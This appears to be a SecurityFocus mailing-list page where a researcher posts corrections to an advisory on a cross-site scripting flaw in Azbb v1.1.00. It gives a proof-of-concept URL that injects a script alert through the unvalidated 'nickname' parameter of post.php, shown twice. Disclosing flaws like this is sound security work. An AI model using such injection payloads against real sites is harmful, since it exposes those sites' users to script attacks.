Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
[CORRECTIONS AND ADDITIONS ]Azbb v1.1.00 Cross-Site Scripting
Jan 28 2006 07:30AM
roozbeh_afrasiabi yahoo com
PoC :
--------------------
1)
This flaw exists because the application does not validate the "nickname"
variable upon submission to the post.php script via the POST method.
h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!-
-
--------------------
...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
--------------------
1)
This flaw exists because the application does not validate the "nickname"
variable upon submission to the post.php script via the POST method.
h**p://www.[target]/post.php?nickname="><script>alert('XSS')</script><!-
-
--------------------
...
[ more ]